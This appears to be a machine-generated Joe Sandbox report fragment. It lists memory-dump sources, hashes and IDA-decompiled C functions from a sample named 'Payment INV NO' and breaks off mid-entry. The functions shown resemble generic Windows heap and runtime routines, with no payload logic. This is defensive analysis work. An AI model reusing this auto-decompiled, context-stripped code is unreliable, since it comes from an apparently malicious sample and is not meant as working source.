                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                          • Instruction ID: c20fa31fa8aaf6c872a6879f87d44f8ce6c4a612ed052da13e32c750e3771572
                                                          • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                          • Instruction Fuzzy Hash: 21E02B323405016BE7119E09CCC4F43B77DDFD2724F044078F6011E242C6E5DD0987A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017B746D Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E017B746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E017AEB70(__ecx, 0x18879a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E017D95D0();
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                          0x017b746d
                                                          0x017b746d
                                                          0x017b746d
                                                          0x017b7471
                                                          0x017b7488
                                                          0x017ff92d
                                                          0x017b748e
                                                          0x017b7491
                                                          0x017b7495
                                                          0x017ff937
                                                          0x017ff93a
                                                          0x017ff94e
                                                          0x017ff953
                                                          0x017ff956
                                                          0x017ff956
                                                          0x017b7495
                                                          0x00000000
                                                          0x017b7488
                                                          0x017b7473
                                                          0x017b7478
                                                          0x017b747d
                                                          0x017b7481
                                                          0x00000000
                                                          0x017b7481
                                                          0x017b747d
                                                          0x017b747a
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a71e43b76c9c46b6e1b1ecc3afbce65a098d9cc78576d54455443916c69c4e6d
                                                          • Instruction ID: 59c34568520d908407566982ae5c1f8436a76c3c2e989798963363d23733d092
                                                          • Opcode Fuzzy Hash: a71e43b76c9c46b6e1b1ecc3afbce65a098d9cc78576d54455443916c69c4e6d
                                                          • Instruction Fuzzy Hash: 8AF0E935604145AADF0AD76CC8C0FFAFF71AF84311F540299D551AF1D1E76C9800C785
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01794F2E Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E01794F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						L018688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E017BC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1771030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                          0x01794f2e
                                                          0x01794f34
                                                          0x01794f38
                                                          0x017f0b85
                                                          0x017f0b85
                                                          0x017f0b89
                                                          0x017f0b9a
                                                          0x017f0b9a
                                                          0x017f0b9f
                                                          0x00000000
                                                          0x017f0b9f
                                                          0x017f0b94
                                                          0x017f0b98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f0b98
                                                          0x01794f3e
                                                          0x01794f48
                                                          0x00000000
                                                          0x01794f6e
                                                          0x00000000
                                                          0x01794f70

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d840518a7bd3302f74e8462e282a341cd3023ba34a166e585651ac7f525160aa
                                                          • Instruction ID: 869f7ee9d9ddc14194396e6526a47752cff12153a49c27553b728891f61143f7
                                                          • Opcode Fuzzy Hash: d840518a7bd3302f74e8462e282a341cd3023ba34a166e585651ac7f525160aa
                                                          • Instruction Fuzzy Hash: 21F0BE325296898FDB62CB1CCA84B23F7DABB007B8F54446CE60587B23C724E845C640
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179354C Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0179354C(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t16;
				void* _t18;
				void* _t19;
				void* _t20;

				_t17 = __ecx;
				_t20 = __ecx;
				if(__ecx == 0 || E017BC5D5(__ecx, _t18) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x1771008 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						L018688F5(_t16, _t17, _t18, _t19, _t20, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				} else {
					return 1;
				}
			}









                                                          0x0179354c
                                                          0x01793552
                                                          0x01793556
                                                          0x017efef1
                                                          0x017efef5
                                                          0x017eff06
                                                          0x017eff06
                                                          0x017eff0b
                                                          0x00000000
                                                          0x017eff0b
                                                          0x017eff00
                                                          0x017eff04
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01793589
                                                          0x00000000
                                                          0x0179358b

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 207ba37c5fff69e85db6a2517f1b5d5616da7a18ab8353801e4434c06e36373d
                                                          • Instruction ID: 71cbbf606eb8235cfc5d0eed966f350bdf96ca12f3cf05d12bcb731025ee2eaa
                                                          • Opcode Fuzzy Hash: 207ba37c5fff69e85db6a2517f1b5d5616da7a18ab8353801e4434c06e36373d
                                                          • Instruction Fuzzy Hash: 0EF0A0329157999FDB22D72CC148F22FBD8AB0DB74FA58065E809C7D03C728EC80C690
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017CA44B Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017CA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1887b9c; // 0x0
				_t15 = __ecx;
				_t16 = E017B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E017DFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                          0x017ca44b
                                                          0x017ca453
                                                          0x017ca472
                                                          0x017ca476
                                                          0x00000000
                                                          0x017ca493
                                                          0x017ca47a
                                                          0x017ca47f
                                                          0x017ca486
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 97340cff43b0cc96ce06b854ec119e924f9df4acbfc813ba321dc763f0c489eb
                                                          • Instruction ID: d17979342168703b4814c5fa73ec7418d5af657532d8f7cf4cb46d430e691dd3
                                                          • Opcode Fuzzy Hash: 97340cff43b0cc96ce06b854ec119e924f9df4acbfc813ba321dc763f0c489eb
                                                          • Instruction Fuzzy Hash: B4E09272A01425ABD2215E1CAC00F66F3AEDBE5B52F194039E605C7214E628DE02C7E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017915C1 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017915C1(intOrPtr* __ecx, signed char __edx, intOrPtr _a4) {
				intOrPtr* _t17;

				_t14 = __ecx;
				_t17 = __ecx;
				if(( *(__edx + 2) & 0x00000001) != 0) {
					L5:
					return 0;
				}
				 *((intOrPtr*)(__edx)) =  *((intOrPtr*)(__edx)) + 0xffff;
				if( *((intOrPtr*)(__edx)) != 0) {
					goto L5;
				}
				_t4 = _t17 + 8; // 0x8
				if(__edx != _t4) {
					E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __edx);
					_t14 = _t17;
				}
				E01791480(_t14, _a4);
				return 1;
			}




                                                          0x017915c1
                                                          0x017915cb
                                                          0x017915cd
                                                          0x017915f3
                                                          0x00000000
                                                          0x017915f3
                                                          0x017915d4
                                                          0x017915d7
                                                          0x00000000
                                                          0x00000000
                                                          0x017915d9
                                                          0x017915de
                                                          0x017eef10
                                                          0x017eef15
                                                          0x017eef15
                                                          0x017915e7
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
